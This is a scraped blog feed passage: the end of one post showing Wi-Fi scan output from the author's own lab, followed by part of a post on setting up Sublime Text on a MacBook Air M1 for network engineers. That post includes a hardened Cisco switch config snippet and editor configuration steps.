test <span style="color: #ff6600;">38</span>:<span style="color: #ff6600;">17</span>:c3:<span style="color: #ff6600;">12</span>:<span style="color: #ff6600;">0</span>c:<span style="color: #ff6600;">20</span> -<span style="color: #ff6600;">71</span> <span style="color: #ff6600;">11</span> Y -- WPA2(PSK/AES/AES)
NETGEAR23 <span style="color: #ff6600;">6</span>c:cd:d6:be:e3:<span style="color: #ff6600;">53</span> -<span style="color: #ff6600;">71</span> <span style="color: #ff6600;">4</span> Y US WPA2(PSK/AES/AES)
HP-Print-F8-Officejet Pro <span style="color: #ff6600;">8600</span> <span style="color: #ff6600;">10</span>:<span style="color: #ff6600;">1f</span>:<span style="color: #ff6600;">74</span>:<span style="color: #ff6600;">63</span>:<span style="color: #ff6600;">41</span>:f8 -<span style="color: #ff6600;">66</span> <span style="color: #ff6600;">1</span> N -- NONE
test <span style="color: #ff6600;">9</span>c:<span style="color: #ff6600;">8</span>c:d8:<span style="color: #ff6600;">11</span>:<span style="color: #ff6600;">7</span>a:e0 -<span style="color: #ff6600;">45</span> <span style="color: #ff6600;">1</span> Y -- WPA2(PSK/AES/AES)
test <span style="color: #ff6600;">9</span>c:<span style="color: #ff6600;">8</span>c:d8:<span style="color: #ff6600;">11</span>:<span style="color: #ff6600;">7</span>a:f0 -<span style="color: #ff6600;">50</span> <span style="color: #ff6600;">36</span> Y US WPA2(PSK/AES/AES)
</pre></div>
<p><br /></p><h4 style="text-align: left;">Scan a specific SSID</h4><p>You can include an SSID after the -s to get information on only that SSID:</p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">airport -s test
SSID BSSID RSSI CHANNEL HT CC <span style="color: #cc00ff;">SECURITY</span> (auth/unicast/<span style="color: #006699; font-weight: bold;">group</span>)
test <span style="color: #ff6600;">38</span>:<span style="color: #ff6600;">17</span>:c3:<span style="color: #ff6600;">12</span>:<span style="color: #ff6600;">0</span>c:<span style="color: #ff6600;">30</span> -<span style="color: #ff6600;">76</span> <span style="color: #ff6600;">52</span> Y -- WPA2(PSK/AES/AES)
test <span style="color: #ff6600;">38</span>:<span style="color: #ff6600;">17</span>:c3:<span style="color: #ff6600;">12</span>:<span style="color: #ff6600;">0</span>c:<span style="color: #ff6600;">20</span> -<span style="color: #ff6600;">67</span> <span style="color: #ff6600;">11</span> Y -- WPA2(PSK/AES/AES)
test <span style="color: #ff6600;">9</span>c:<span style="color: #ff6600;">8</span>c:d8:<span style="color: #ff6600;">11</span>:<span style="color: #ff6600;">7</span>a:e0 -<span style="color: #ff6600;">46</span> <span style="color: #ff6600;">1</span> Y -- WPA2(PSK/AES/AES)
test <span style="color: #ff6600;">9</span>c:<span style="color: #ff6600;">8</span>c:d8:<span style="color: #ff6600;">11</span>:<span style="color: #ff6600;">7</span>a:f0 -<span style="color: #ff6600;">50</span> <span style="color: #ff6600;">36</span> Y US WPA2(PSK/AES/AES)
</pre></div>
<p><br /></p><p>This example is my lab. You can see that I have two APs, both of which have a 2.4Ghz and 5Ghz radio.</p><p><br /></p><p>That does it for Part 4. Be sure to check back soon for Part 5!</p><p><br /></p><div><b>References</b></div><div><a href="https://gitlab.com/wireshark/wireshark/-/wikis/CaptureSetup/VLAN">Wireshark Wiki - Capture Setup/Vlan</a><br /></div><div><a href="https://wisetut.com/how-to-ping-ipv6-in-linux-windows-and-macos/">How To Ping IPv6 In Linux, Windows, and MacOS?</a><br /></div><div><a href="https://www.lifewire.com/using-netstat-command-on-mac-4176069">How to Use the Netstat Command on Mac</a><br /></div><div><a href="https://medium.com/macoclock/network-warrior-how-to-use-macos-network-utilities-63c88f490ba0">Network Warrior: How to use macOS network utilities</a></div><div><a href="https://beebom.com/how-share-internet-from-mac-over-wifi-ethernet/">How to Share Internet From Mac Over WiFi or Ethernet</a></div><div><a href="https://apple.stackexchange.com/questions/336888/whats-the-meanings-of-the-routing-tables-data-in-the-mac-os">What's the meaning of the routing table data in macOS?</a></div><div><a href="https://www.youtube.com/watch?v=Co1mfb3FRtU&t=346s">5 Terminal Commands EVERY Mac User Should Know! (Routing, Wi-Fi, disk usage)</a><br /></div><div><br /></div><p><br /></p><p><br /></p><p></p></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br />@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com3tag:blogger.com,1999:blog-690329124282786689.post-17780137050060900592021-03-15T22:46:00.051-07:002021-12-24T21:12:51.697-08:00Apple MacBook Air M1 for Network Engineers Part 3<p>If you have been following along you now have macOS tuned up and some basic applications installed. If you need to read other parts of this series:</p><p></p><ul style="text-align: left;"><li><a href="https://mwhubbard.blogspot.com/2021/05/apple-macbook-air-m1-for-network.html">Apple MacBook Air M1 for Network Engineers Part 5</a></li><li><a href="https://mwhubbard.blogspot.com/2021/04/if-you-have-been-following-along-with.html">Apple MacBook Air M1 for Network Engineers Part 4</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html">Apple MacBook Air M1 for Network Engineers Part 2</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network.html">Apple MacBook Air M1 for Network Engineers Part 1</a></li></ul><p></p><p>In part 3 we will continue installing applications.</p><p></p><ul style="text-align: left;"><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_77.html#Subl">Sublime Text 3 - A highly customizable text editor</a></li><ul><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_77.html#terminal">Open Sublime text from the terminal</a></li><li><h4 style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, Verdana, sans-serif; font-size: 13.2px; margin: 0px; position: relative;"><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_77.html#nettech">The Network Tech Cisco plugin</a></h4></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_77.html#usingregex">Using Regular Expression to search/replace</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_77.html#regexq">Regex Quantifiers</a></li></ul><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_77.html#speedtest">Speedtest-cli - Run OOKLA speedtest from the terminal</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_77.html#iterm2">iTerm2 - A fantastic terminal application</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_77.html#onyx">Onyx - Operating system utilities for macOS</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_77.html#ticker">Ticker - A stock market app for the terminal</a></li></ul><div><br /></div><div><br /></div><p></p><h3 id="Subl" style="text-align: left;">Sublime text</h3><p>One of the most popular editors for python developers. There is a free version that is fully functional but will ask you to buy once in a while and a paid version for $74.95. The license for the paid version lets you install it on all of your personal computers and it runs on Mac, Linux, and Windows so I purchased a license.</p><p>There are many tutorials on setting up Sublimetext for developers. </p><p>realpython.com has some of my favorite tutorials:</p><p><a href="https://realpython.com/setting-up-sublime-text-3-for-full-stack-python-development/">Setting Up Sublime Text 3 for Full Stack Python Development</a><br /></p><p>realpython.com also sells a package on python/sublimetext that includes detailed videos and pdfs on Sublimetext and Python for $59. I purchased it and was not disappointed. In fact, I signed up for the realpython.com membership for $100 per year.</p><p><a href="https://realpython.com/products/sublime-python/">Why is it so hard to find good and clear instructions on how to make Sublime more Python friendly?</a> </p><p>There are many reasons to give Sublime text a try if you are a network engineer, one of my favorites is that you can put a list of all the open files on the left side. This is much better than notepad ++ on Windows if you are working with several files at one time. You can even click and drag the files to change their order in the "Open Files" window. </p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyGFKD7_KOfWlWXaMalRN1gkZMA2P3HCEDadVO7mvJdEWHcCGOtNwEIQ9HJQcGfbXFu_8fAfDhY68DxM76zHUcE-Bb8Kd54sYmGbFjk5WYyL0ejfpcXp9AZBUOoyizVXpkKQpo5Myg7L6O/s932/Screen+Shot+2021-04-30+at+22.24.55.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="456" data-original-width="932" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyGFKD7_KOfWlWXaMalRN1gkZMA2P3HCEDadVO7mvJdEWHcCGOtNwEIQ9HJQcGfbXFu_8fAfDhY68DxM76zHUcE-Bb8Kd54sYmGbFjk5WYyL0ejfpcXp9AZBUOoyizVXpkKQpo5Myg7L6O/w458-h225/Screen+Shot+2021-04-30+at+22.24.55.png" width="458" /></a></div><br /><p><br /></p><p><b>Installation</b></p><p></p><ul style="text-align: left;"><li>Download the package from <a href="https://www.sublimetext.com">www.sublimetext.com</a></li><li>Open the dmg file.</li><li>Drag to the applications folder</li><li>Set Sublimetext as the default editor for text documents.</li><li>In finder, locate a .txt file, right-click, get info, set "Open with" to Sublimetext.app.</li></ul><p></p><p><br /></p><p>Set the option to open files in the same window but a new tab.</p><p>Go to “Sublime Text” → “Preferences” → “Settings.”</p><p>Add the following property to your Sublime user configuration file:</p><p><br /></p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 240, 240); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">{
<span style="color: #4070a0;">"open_files_in_new_window"</span>: false
}
</pre></div>
<p><br /></p><p>The windows will look like this:</p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaJIa9_DzfIMS7s4Bu9uJNWGU0eAlnlXPacq84oDqgXW-Ogse88GH9P_TRkq5oZ8CTnamcE5HPAdHA5x_2Oyv1xShwpAy1_9kZgZYCcRzF9qIxtLV61wO5UXGh6G-djJIhLanvTD3ePXpE/s1180/Sublimetext-new-tab.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="234" data-original-width="1180" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaJIa9_DzfIMS7s4Bu9uJNWGU0eAlnlXPacq84oDqgXW-Ogse88GH9P_TRkq5oZ8CTnamcE5HPAdHA5x_2Oyv1xShwpAy1_9kZgZYCcRzF9qIxtLV61wO5UXGh6G-djJIhLanvTD3ePXpE/w631-h124/Sublimetext-new-tab.png" width="631" /></a></div><br /><p>If there are already settings in the file, just add the </p><p>"open_files_in_new_window": false </p><p>between the starting and closing brackets on its own line. All of the lines except the last one have to have a comma at the end.</p><p>Save and close the two settings windows that opened. Now when you double click on a file it will open in the same window, in a new tab.</p><p><b>Reference</b></p><p><a href="https://woorkup.com/sublime-text-open-files-same-window/">Sublime text open files same window</a><br /></p><h4 style="text-align: left;">Zooming</h4><div>To increase the text size</div><div>Press "⌘" and tap "+"</div><div><br /></div><div>To decrease the text size</div><div>Press "⌘" and tap "-"</div><div><br /></div><div><br /></div><div><b>Returning to your default text size</b></div><div><br /></div><div>Add the following to your keyboard bindings (found under Preferences)...</div><div><br /></div><div>{ "keys": ["super+0"], "command": "reset_font_size" }</div><div><br /></div><div>Super is the ⌘ key on macOS (ctrl on Windows/Linux)</div><div><br /></div><div>super+0 would normally focus the 9th open tab in a Window, so you'll be overriding that behavior.</div><div><br /></div><div>I found this great tip in the link below.</div><h4 style="text-align: left;">Reference</h4><div><a href="https://coderwall.com/p/nvz-ra/resetting-sublime-text-s-zoom-font-size-via-keyboard">Resetting Sublime Text's Zoom/Font Size via Keyboard</a><br /></div><div> </div><div><br /></div><h4 style="text-align: left;">Using Snippets</h4><p>This allows you to create snippets of text and insert them with a "trigger word" or from the tools menu. This site shows how to get started. There is an error in how to create a new snippet. Instead of tools, new snippet, it's tools, developer, new snippet.</p><p><a href="https://www.granneman.com/webdev/editors/sublime-text/top-features-of-sublime-text/quickly-insert-text-and-code-with-sublime-text-snippets">quickly insert text and code with sublime text snippets</a><br /></p><p> Here is a sample snippet I made to start a config file for a cisco IOS-XE switch.</p><p> </p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #555555;"><</span>snippet<span style="color: #555555;">></span>
<span style="color: #555555;"><</span>content<span style="color: #555555;">><</span><span style="background-color: #ffaaaa; color: #aa0000;">!</span>[CDATA[
no service pad
service tcp<span style="color: #555555;">-</span>keepalives<span style="color: #555555;">-</span><span style="color: black; font-weight: bold;">in</span>
service tcp<span style="color: #555555;">-</span>keepalives<span style="color: #555555;">-</span>out
service timestamps debug datetime msec localtime
service timestamps log datetime msec localtime
service password<span style="color: #555555;">-</span>encryption
service linenumber
service sequence<span style="color: #555555;">-</span>numbers
service counters <span style="color: #336666;">max</span> age <span style="color: #ff6600;">5</span>
no service dhcp
clock timezone PST <span style="color: #555555;">-</span><span style="color: #ff6600;">8</span> <span style="color: #ff6600;">0</span>
clock summer<span style="color: #555555;">-</span>time PDT recurring
no ip source<span style="color: #555555;">-</span>route
no ip gratuitous<span style="color: #555555;">-</span>arps
no ip domain lookup
login on<span style="color: #555555;">-</span>failure log
login on<span style="color: #555555;">-</span>success log
ipv6 nd raguard policy HOST_POLICY
spanning<span style="color: #555555;">-</span>tree mode rapid<span style="color: #555555;">-</span>pvst
spanning<span style="color: #555555;">-</span>tree portfast default
archive
log config
logging enable
logging size <span style="color: #ff6600;">1000</span>
interface GigabitEthernet1<span style="color: #555555;">/</span><span style="color: #ff6600;">0</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1</span>
switchport access vlan xxx
switchport mode access
switchport nonegotiate
load<span style="color: #555555;">-</span>interval <span style="color: #ff6600;">30</span>
no cdp enable
ipv6 nd raguard attach<span style="color: #555555;">-</span>policy HOST_POLICY
storm<span style="color: #555555;">-</span>control broadcast level <span style="color: #ff6600;">1.00</span>
storm<span style="color: #555555;">-</span>control multicast level <span style="color: #ff6600;">1.00</span>
ip verify source
exit
ip default<span style="color: #555555;">-</span>gateway x<span style="color: #555555;">.</span>x<span style="color: #555555;">.</span>x<span style="color: #555555;">.</span>x
ip forward<span style="color: #555555;">-</span>protocol nd
no ip http server
ip http authentication local
ip http secure<span style="color: #555555;">-</span>server
ip http secure<span style="color: #555555;">-</span>ciphersuite aes<span style="color: #555555;">-</span><span style="color: #ff6600;">256</span><span style="color: #555555;">-</span>cbc<span style="color: #555555;">-</span>sha ecdhe<span style="color: #555555;">-</span>rsa<span style="color: #555555;">-</span>aes<span style="color: #555555;">-</span>gcm<span style="color: #555555;">-</span>sha2 ecdhe<span style="color: #555555;">-</span>ecdsa<span style="color: #555555;">-</span>aes<span style="color: #555555;">-</span>gcm<span style="color: #555555;">-</span>sha2
ip http tls<span style="color: #555555;">-</span>version TLSv1<span style="color: #555555;">.</span><span style="color: #ff6600;">2</span>
ip ssh rsa keypair<span style="color: #555555;">-</span>name SSH<span style="color: #555555;">-</span>KEYS
ip ssh version <span style="color: #ff6600;">2</span>
ip ssh server algorithm mac hmac<span style="color: #555555;">-</span>sha2<span style="color: #555555;">-</span><span style="color: #ff6600;">256</span> hmac<span style="color: #555555;">-</span>sha2<span style="color: #555555;">-</span><span style="color: #ff6600;">512</span>
ip ssh server algorithm encryption aes256<span style="color: #555555;">-</span>ctr aes192<span style="color: #555555;">-</span>ctr aes128<span style="color: #555555;">-</span>ctr
ip scp server enablebanner exec <span style="color: #555555;">^</span>CC
<span style="color: #555555;">*********************************************************</span>
Switch Name: xxxxxxxx
Description: yyyyyyyyyyyyyyyy
<span style="color: #555555;">*********************************************************</span>
<span style="color: #555555;">^</span>C
<span style="background-color: #ffaaaa; color: #aa0000;">$</span><span style="color: #ff6600;">1</span>
]]<span style="color: #555555;">></</span>content<span style="color: #555555;">></span>
<span style="color: #555555;"><</span><span style="background-color: #ffaaaa; color: #aa0000;">!</span><span style="color: #555555;">--</span> Optional: Set a tabTrigger to define how to trigger the snippet <span style="color: #555555;">--></span>
<span style="color: #555555;"><</span>tabTrigger<span style="color: #555555;">></span>basic<span style="color: #555555;">-</span>cisco<span style="color: #555555;"></</span>tabTrigger<span style="color: #555555;">></span>
<span style="color: #555555;"><</span><span style="background-color: #ffaaaa; color: #aa0000;">!</span><span style="color: #555555;">--</span> Optional: Set a scope to limit where the snippet will trigger <span style="color: #555555;">--></span>
<span style="color: #555555;"><</span>scope<span style="color: #555555;">></span>text<span style="color: #555555;"></</span>scope<span style="color: #555555;">></span>
<span style="color: #555555;"><</span>description<span style="color: #555555;">></span> Cisco start up <span style="color: #555555;"></</span>description<span style="color: #555555;">></span>
<span style="color: #555555;"></</span>snippet<span style="color: #555555;">></span>
</pre></div>
<div><br /></div>I used "basic-cisco" as the trigger so I can type basic-cisco [tab] and sublime text inserts it and moves the cursor to a new line. Obviously, basic-HPE, basic-Arubacx will be next!<p></p><p> I could also click tools, snippet, and pick it from the list.</p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYdTmpE20TbI1tj1Da_mok4Qiie3miWVNUMLGUXvmyDpha1ym2T41fkJHAUQgiGrnKSjYU6lrspQxLoFHtcXt56eK6MxMxBlC-AkNesWIGgZyJyS2rl233_jIfF30Nnz0BNUxOvqtJM5Jm/s1198/Sublimetext-snippets.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="200" data-original-width="1198" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYdTmpE20TbI1tj1Da_mok4Qiie3miWVNUMLGUXvmyDpha1ym2T41fkJHAUQgiGrnKSjYU6lrspQxLoFHtcXt56eK6MxMxBlC-AkNesWIGgZyJyS2rl233_jIfF30Nnz0BNUxOvqtJM5Jm/w555-h92/Sublimetext-snippets.png" width="555" /></a></div><br /><p></p><p>The part of the snippet "<span><description></span> <span>Cisco</span> <span>start</span> <span>up</span> <span></description>" sets the description you see on the right of the men.</span></p><p><br /></p>
<h4 id="terminal" style="text-align: left;">Open Sublime Text from the terminal</h4><p>A lot of time I want to just type "subl <filename>" from the terminal to edit a file. I also want to use Sublime text for my git commit messages. Sublime provides instructions to set this up on macOS.</p><h4 style="text-align: left;">Setup</h4>
The first task is to make a symlink to subl. Assuming you've placed Sublime Text in the Applications folder, and that you have a ~/bin directory in your path, you can run:<p><br /></p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">ln <span style="color: #555555;">-</span>s <span style="color: #cc3300;">"/Applications/Sublime Text.app/Contents/SharedSupport/bin/subl"</span> <span style="color: #555555;">~/</span><span style="color: #336666;">bin</span><span style="color: #555555;">/</span>subl
</pre></div>
<p><br /></p><p>The EDITOR environment variable</p>
<p>To use Sublime Text as the editor for many commands that prompt for input, set your EDITOR environment variable:</p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">export EDITOR<span style="color: #555555;">=</span><span style="color: #cc3300;">'subl -w'</span>
</pre></div>
<p>Specifying -w will cause the subl command to not exit until the file is closed.</p><p>On my M1 I had to add the bin folder and this to the .zshrc file:
<!--HTML generated using hilite.me--></p><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">export PATH<span style="color: #555555;">=</span><span style="background-color: #ffaaaa; color: #aa0000;">$</span>HOME<span style="color: #555555;">/</span><span style="color: #336666;">bin</span>:<span style="background-color: #ffaaaa; color: #aa0000;">$</span>PATH
</pre></div>
<p>to make this work but now I can just type subl to start sublime text from the terminal.</p><p><br /></p><h4>Reference</h4><div style="text-align: left;"><a href="https://www.sublimetext.com/docs/3/osx_command_line.html">OS X Command Line<br /></a><a href="https://stackoverflow.com/questions/25152711/subl-command-not-working-command-not-found/25154529">Subl command not working - command not found</a></div><p><br /></p><h4 style="text-align: left;">Finding Differences</h4><p>One really useful feature in Sublime text is the difference engine. An example will make it clear. </p><p>In this file I changed the following:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">interface <span style="color: #ff6600;">1</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1</span><span style="color: #555555;">-</span><span style="color: #ff6600;">1</span><span style="color: #555555;">/</span><span style="color: #ff6600;">48</span>
</pre></div>
<div>to<br /><p><!--HTML generated using hilite.me--></p><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">interface <span style="color: #ff6600;">1</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1</span><span style="color: #555555;">-</span><span style="color: #ff6600;">1</span><span style="color: #555555;">/</span><span style="color: #ff6600;">48</span>,<span style="color: #ff6600;">2</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1</span><span style="color: #555555;">-</span><span style="color: #ff6600;">2</span><span style="color: #555555;">/</span><span style="color: #ff6600;">48</span>,<span style="color: #ff6600;">3</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1</span><span style="color: #555555;">-</span><span style="color: #ff6600;">3</span><span style="color: #555555;">/</span><span style="color: #ff6600;">48</span>
</pre></div>
<p>In Sublime text, I right clicked over the line and selected "Show Diff Hunk"</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNaewpM_rV50_ArqXLaEnz7TU-DNAsTyWGIzqs7KWTrK5ThrwWdYWmlKcV4YpqcHQ-CvXM58cElyYjGkMIcwn7A8Q2m2LZEN919XcaApv0iRAPozCMNnUytA43QhcAJn0N1n50jb_TofFI/s1250/Screen+Shot+2021-09-19+at+16.24.04.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="202" data-original-width="1250" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNaewpM_rV50_ArqXLaEnz7TU-DNAsTyWGIzqs7KWTrK5ThrwWdYWmlKcV4YpqcHQ-CvXM58cElyYjGkMIcwn7A8Q2m2LZEN919XcaApv0iRAPozCMNnUytA43QhcAJn0N1n50jb_TofFI/w449-h52/Screen+Shot+2021-09-19+at+16.24.04.png" width="449" /></a></div><br /><p>Now Sublime text shows an orange bar on the left and the old string. Right clicking over the line again will show "Hide Diff Hunk", Revert Diff Hunk and show unsaved changes.</p><p>The "Show Unsaved Changes" will open a "Git" style windows and show you all the unsaved changes in the file.</p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #555555;">---</span> <span style="color: #555555;">/</span>Users<span style="color: #555555;">/</span>mhubbard<span style="color: #555555;">/</span>GoogleDrive<span style="color: #555555;">/</span><span style="color: #ff6600;">01</span>_Vector<span style="color: #555555;">/</span>network Refresh<span style="color: #555555;">/</span>Site<span style="color: #555555;">-</span><span style="color: #ff6600;">49</span><span style="color: #555555;">/</span><span style="color: #ff6600;">2930.</span>txt Fri Sep <span style="color: #ff6600;">17</span> <span style="color: #ff6600;">09</span>:<span style="color: #ff6600;">58</span>:<span style="color: #ff6600;">10</span> <span style="color: #ff6600;">2021</span>
<span style="color: #555555;">+++</span> <span style="color: #555555;">/</span>Users<span style="color: #555555;">/</span>mhubbard<span style="color: #555555;">/</span>GoogleDrive<span style="color: #555555;">/</span><span style="color: #ff6600;">01</span>_Vector<span style="color: #555555;">/</span>network Refresh<span style="color: #555555;">/</span>Site<span style="color: #555555;">-</span><span style="color: #ff6600;">49</span><span style="color: #555555;">/</span><span style="color: #ff6600;">2930.</span>txt Sun Sep <span style="color: #ff6600;">19</span> <span style="color: #ff6600;">16</span>:<span style="color: #ff6600;">21</span>:<span style="color: #ff6600;">35</span> <span style="color: #ff6600;">2021</span>
<span style="background-color: #ffaaaa; color: #aa0000;">@@</span> <span style="color: #555555;">-</span><span style="color: #ff6600;">13</span>,<span style="color: #ff6600;">7</span> <span style="color: #555555;">+</span><span style="color: #ff6600;">13</span>,<span style="color: #ff6600;">7</span> <span style="background-color: #ffaaaa; color: #aa0000;">@@</span>
time daylight<span style="color: #555555;">-</span>time<span style="color: #555555;">-</span>rule continental<span style="color: #555555;">-</span>us<span style="color: #555555;">-</span><span style="color: black; font-weight: bold;">and</span><span style="color: #555555;">-</span>canada
time timezone <span style="color: #555555;">-</span><span style="color: #ff6600;">480</span>
spanning<span style="color: #555555;">-</span>tree
<span style="color: #555555;">-</span>interface <span style="color: #ff6600;">1</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1</span><span style="color: #555555;">-</span><span style="color: #ff6600;">1</span><span style="color: #555555;">/</span><span style="color: #ff6600;">48</span>
<span style="color: #555555;">+</span>interface <span style="color: #ff6600;">1</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1</span><span style="color: #555555;">-</span><span style="color: #ff6600;">1</span><span style="color: #555555;">/</span><span style="color: #ff6600;">48</span>,<span style="color: #ff6600;">2</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1</span><span style="color: #555555;">-</span><span style="color: #ff6600;">2</span><span style="color: #555555;">/</span><span style="color: #ff6600;">48</span>,<span style="color: #ff6600;">3</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1</span><span style="color: #555555;">-</span><span style="color: #ff6600;">3</span><span style="color: #555555;">/</span><span style="color: #ff6600;">48</span>
rate<span style="color: #555555;">-</span>limit bcast <span style="color: black; font-weight: bold;">in</span> percent <span style="color: #ff6600;">1</span>
</pre></div>
<h4 id="nettech" style="text-align: left;"><br /></h4><h4 id="nettech" style="text-align: left;"><br /></h4><h4 id="nettech" style="text-align: left;">The Network Tech Cisco plugin</h4><p>This is a great open-source plug-in for Cisco network engineers. I have found that it does a reasonable job highlighting Aruba text and the network calculations work.</p><p>It highlights the keywords in the code, works with IOS, IOS-XR, Nexus, ASA, and ACE code. It also has:</p><p></p><ul style="text-align: left;"><li>code completion</li><li>Mask Conversions</li><li>Quick Info - Display subnet information</li><li>Format MAC Addresses by Colon, Dash or Dot</li><li>Password Decode - Decode type 7 passwords</li><li>Jumping - Quickly jump around large configuration using Symbols</li><li>Search for networks</li></ul><div><b><br /></b></div><div><b>Installation</b></div><div><br /></div><p></p><div>Install Sublime Text's Package Control</div><div><div>Tools - Command Pallet</div><div>Install Package Control</div><div><enter></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQpo-yRZCXQONvqjSSftNmUQtrQ6Y4bM7bQ76z_2pcw5iPhJQvYxAjAdoWk675qRtVh3sNoQgZwPiZvZYXk_XievxE4vM8JXfkbiIQSIFFkDdC_QLs0Lr6G89m_8TLbm8fGLs4lVSUGvSK/s1202/Screen+Shot+2021-04-22+at+21.18.31.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="258" data-original-width="1202" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQpo-yRZCXQONvqjSSftNmUQtrQ6Y4bM7bQ76z_2pcw5iPhJQvYxAjAdoWk675qRtVh3sNoQgZwPiZvZYXk_XievxE4vM8JXfkbiIQSIFFkDdC_QLs0Lr6G89m_8TLbm8fGLs4lVSUGvSK/w403-h87/Screen+Shot+2021-04-22+at+21.18.31.png" width="403" /></a></div><br /><div><br /></div><div><br /></div><div>Install the package:</div><div>Tools - Command Pallet</div><div><br /></div><div> Package Control: Install Package</div><div> [enter]</div><div> Network Tech</div><div>[enter]</div></div><div><br /></div><p><b>Set the syntax type</b></p><p>Open a file to edit or start a new file.</p><p>Supported configurations:</p><p></p><ul style="text-align: left;"><li>Cisco ASA</li><li>Cisco ACE</li><li>Cisco IOS</li><li>Cisco IOS XR</li><li>Cisco NXOS</li></ul><p></p><p>Set the syntax from the command pallet</p><p>Tools - Command Pallet OR cmd+shift+p</p><p>Set Syntax: Cisco IOS <enter></p><div class="separator" style="clear: both; text-align: 